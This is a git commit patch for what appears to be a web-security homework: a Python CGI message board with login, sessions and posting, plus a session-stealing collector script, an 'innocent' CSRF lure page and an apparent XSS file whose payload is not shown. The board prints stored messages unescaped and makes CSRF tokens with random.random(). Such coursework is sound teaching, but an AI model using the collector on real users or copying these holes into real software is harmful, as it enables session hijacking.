From 24cd8bc11345395f1a0bb64d61e51e207d8b3ace Mon Sep 17 00:00:00 2001 From: 53hornet <53hornet@gmail.com> Date: Sat, 2 Feb 2019 23:10:20 -0500 Subject: Init. --- hw4/.gitignore | 3 ++ hw4/cat.jpg | Bin 0 -> 50325 bytes hw4/cgi-bin/._board.py | Bin 0 -> 355 bytes hw4/cgi-bin/._login.py | Bin 0 -> 299 bytes hw4/cgi-bin/._logout.py | Bin 0 -> 299 bytes hw4/cgi-bin/._output.py | Bin 0 -> 299 bytes hw4/cgi-bin/._post.py | Bin 0 -> 299 bytes hw4/cgi-bin/._steal_session.py | Bin 0 -> 299 bytes hw4/cgi-bin/board.py | 21 +++++++++ hw4/cgi-bin/login.py | 39 +++++++++++++++++ hw4/cgi-bin/logout.py | 23 ++++++++++ hw4/cgi-bin/output.py | 97 +++++++++++++++++++++++++++++++++++++++++ hw4/cgi-bin/post.py | 39 +++++++++++++++++ hw4/cgi-bin/steal_session.py | 24 ++++++++++ hw4/csrf.html | 14 ++++++ hw4/index.html | 1 + hw4/messages | 4 ++ hw4/sessions | 0 hw4/simple-xss.txt | 1 + hw4/stolen_sessions | 0 hw4/users | 2 + 21 files changed, 268 insertions(+) create mode 100644 hw4/.gitignore create mode 100644 hw4/cat.jpg create mode 100755 hw4/cgi-bin/._board.py create mode 100755 hw4/cgi-bin/._login.py create mode 100755 hw4/cgi-bin/._logout.py create mode 100755 hw4/cgi-bin/._output.py create mode 100755 hw4/cgi-bin/._post.py create mode 100755 hw4/cgi-bin/._steal_session.py create mode 100755 hw4/cgi-bin/board.py create mode 100755 hw4/cgi-bin/login.py create mode 100755 hw4/cgi-bin/logout.py create mode 100755 hw4/cgi-bin/output.py create mode 100755 hw4/cgi-bin/post.py create mode 100755 hw4/cgi-bin/steal_session.py create mode 100644 hw4/csrf.html create mode 100644 hw4/index.html create mode 100644 hw4/messages create mode 100644 hw4/sessions create mode 100644 hw4/simple-xss.txt create mode 100644 hw4/stolen_sessions create mode 100644 hw4/users (limited to 'hw4') diff --git a/hw4/.gitignore b/hw4/.gitignore new file mode 100644 index 0000000..8a80dbd --- /dev/null +++ b/hw4/.gitignore @@ -0,0 +1,3 @@ +*.pyc +*.log + diff --git a/hw4/cat.jpg b/hw4/cat.jpg new file mode 100644 index 0000000..1890aa8 Binary files /dev/null and b/hw4/cat.jpg differ diff --git a/hw4/cgi-bin/._board.py b/hw4/cgi-bin/._board.py new file mode 100755 index 0000000..ef20daa Binary files /dev/null and b/hw4/cgi-bin/._board.py differ diff --git a/hw4/cgi-bin/._login.py b/hw4/cgi-bin/._login.py new file mode 100755 index 0000000..26100f6 Binary files /dev/null and b/hw4/cgi-bin/._login.py differ diff --git a/hw4/cgi-bin/._logout.py b/hw4/cgi-bin/._logout.py new file mode 100755 index 0000000..9d1f260 Binary files /dev/null and b/hw4/cgi-bin/._logout.py differ diff --git a/hw4/cgi-bin/._output.py b/hw4/cgi-bin/._output.py new file mode 100755 index 0000000..25267ab Binary files /dev/null and b/hw4/cgi-bin/._output.py differ diff --git a/hw4/cgi-bin/._post.py b/hw4/cgi-bin/._post.py new file mode 100755 index 0000000..fc9cd5d Binary files /dev/null and b/hw4/cgi-bin/._post.py differ diff --git a/hw4/cgi-bin/._steal_session.py b/hw4/cgi-bin/._steal_session.py new file mode 100755 index 0000000..69e619e Binary files /dev/null and b/hw4/cgi-bin/._steal_session.py differ diff --git a/hw4/cgi-bin/board.py b/hw4/cgi-bin/board.py new file mode 100755 index 0000000..5ca8afc --- /dev/null +++ b/hw4/cgi-bin/board.py @@ -0,0 +1,21 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb + +cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser + +from output import * + +cookie = Cookie.SimpleCookie() # for writing cookies +form = cgi.FieldStorage() # for reading GET datas + +if not Login(): + DisplayLogin() + +# if we get here, this is an authorized user, let's print the messages +PrintMessages() + +exit(0) diff --git a/hw4/cgi-bin/login.py b/hw4/cgi-bin/login.py new file mode 100755 index 0000000..a308dde --- /dev/null +++ b/hw4/cgi-bin/login.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb +import random + +from output import * + +cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser + +cookie = Cookie.SimpleCookie() # for writing cookies +cookie_string = os.environ.get('HTTP_COOKIE') # for reading cookies +form = cgi.FieldStorage() # for reading GET data + +login = form.getvalue('username') +password = form.getvalue('password') +with open('users', 'r') as users: + s = users.read() + if s.find(login + ' ' + password) == -1: + ShowError() + + # else set session id cookie and store it in the file! + s_id = uuid.uuid4().hex + cookie['session_id'] = s_id # login + + # xss protection -- set session_id cookie to httpOnly + cookie['session_id']['httponly'] = '1' + + with open("sessions", "a") as myfile: + # csrf protection -- session token construction + random.seed() + csrfToken = str(random.random()) + myfile.write(s_id + ' ' + login + ' ' + csrfToken + '\n') + + print cookie + +RedirectToBoard() diff --git a/hw4/cgi-bin/logout.py b/hw4/cgi-bin/logout.py new file mode 100755 index 0000000..9d64800 --- /dev/null +++ b/hw4/cgi-bin/logout.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb + +from output import * + +cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser + +cookie = Cookie.SimpleCookie() # for writing cookies +form = cgi.FieldStorage() # for reading GET data + +message = form.getvalue('message') + +user = Login() +if not user: + ShowError() + exit(0) + +RemoveAllUserSessions(user) +RedirectToBoard() diff --git a/hw4/cgi-bin/output.py b/hw4/cgi-bin/output.py new file mode 100755 index 0000000..544ac60 --- /dev/null +++ b/hw4/cgi-bin/output.py @@ -0,0 +1,97 @@ +import os +import re + +def DisplayLogin(): + print 'Content-Type: text/html\n' + print '' + print """ +
+
+ + + + +
+ +
+
+
+ """ + print '' + exit(0) + +def PrintMessages(): + print 'Content-Type: text/html\n' + print '' + + with open("messages", "r") as m_file: + s = m_file.read() + l = s.split('\n') + for i in l: + if len(i) == 0: + continue + i.replace('\\n','\n') + print i + print '

' + print """ +

+
+ Message:
+ +
+
+ """ + print """ +
+ +
+ """ + + print '' + +def ShowError(): + print 'Content-Type: text/html\n' + print '' + print '

Error ocured :P

' + print '' + exit(0) + +def Login(): + cookie_string = os.environ.get('HTTP_COOKIE') # for reading cookies + g = re.search('session_id=(\w+)', cookie_string) # if g==None -- no cookie + if not g: + return False + with open('sessions', 'r') as s_file: + s = s_file.read() + sid = g.group(1) + g = re.search(sid + ' ' + '(\w+)', s) + if not g: + return False + return g.group(1) + +def RedirectToBoard(): + #go back to board.py + print 'Content-Type: text/html\n' + print '' + exit(0) + +def RemoveAllUserSessions(user): + tmp = '' + f = open('sessions', 'r') + for line in f: + if user not in line: + tmp += line + f.close() + with open('sessions','w') as f: + f.write(tmp) diff --git a/hw4/cgi-bin/post.py b/hw4/cgi-bin/post.py new file mode 100755 index 0000000..2a0bf8c --- /dev/null +++ b/hw4/cgi-bin/post.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb + +from output import * + +cgitb.enable() # allows for debugging errors from the cgi scripts in the browser + +cookie = Cookie.SimpleCookie() # for writing cookies +form = cgi.FieldStorage() # for reading POST data + +message = form.getvalue('message') + +user = Login() +if not user: + ShowError() + +if message == None: # to prevent posting empty messages + RedirectToBoard() + +# csrf protection -- check for csrfToken +csrfToken = form.getvalue('csrfToken') + +if csrfToken is None: + ShowError() + +with open('sessions', 'r') as s_file: + for line in s_file: + if user in line and not csrfToken in line: + ShowError() + +message = message.replace('\n','\n') +with open('messages','a') as m: + m.write(user + ': ' + message + '\n') + +RedirectToBoard() diff --git a/hw4/cgi-bin/steal_session.py b/hw4/cgi-bin/steal_session.py new file mode 100755 index 0000000..df84de6 --- /dev/null +++ b/hw4/cgi-bin/steal_session.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb + +from output import * + +cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser + +cookie = Cookie.SimpleCookie() # for writing cookies +form = cgi.FieldStorage() # for reading GET data + +session = form.getvalue('session') + +if session: + with open('stolen_sessions','a') as m: + m.write(session + '\n') + +#Send victim to homepage so they don't notice anything! +print 'Content-Type: text/html\n' +print '

  We got your session key  

' +exit(0) diff --git a/hw4/csrf.html b/hw4/csrf.html new file mode 100644 index 0000000..3e8cdae --- /dev/null +++ b/hw4/csrf.html @@ -0,0 +1,14 @@ + + Innocent page + +

This is innocent page, here is a picture of a cute cat:


+ + + + + + + + + diff --git a/hw4/index.html b/hw4/index.html new file mode 100644 index 0000000..74c862d --- /dev/null +++ b/hw4/index.html @@ -0,0 +1 @@ + diff --git a/hw4/messages b/hw4/messages new file mode 100644 index 0000000..5a94cc2 --- /dev/null +++ b/hw4/messages @@ -0,0 +1,4 @@ +user: The weather is nice today +user: This site seems secure +hacker: I wouldn't be so sure about that... +user: Lol diff --git a/hw4/sessions b/hw4/sessions new file mode 100644 index 0000000..e69de29 diff --git a/hw4/simple-xss.txt b/hw4/simple-xss.txt new file mode 100644 index 0000000..1862081 --- /dev/null +++ b/hw4/simple-xss.txt @@ -0,0 +1 @@ + diff --git a/hw4/stolen_sessions b/hw4/stolen_sessions new file mode 100644 index 0000000..e69de29 diff --git a/hw4/users b/hw4/users new file mode 100644 index 0000000..7059371 --- /dev/null +++ b/hw4/users @@ -0,0 +1,2 @@ +user 1234 +hacker 4321 -- cgit v1.2.3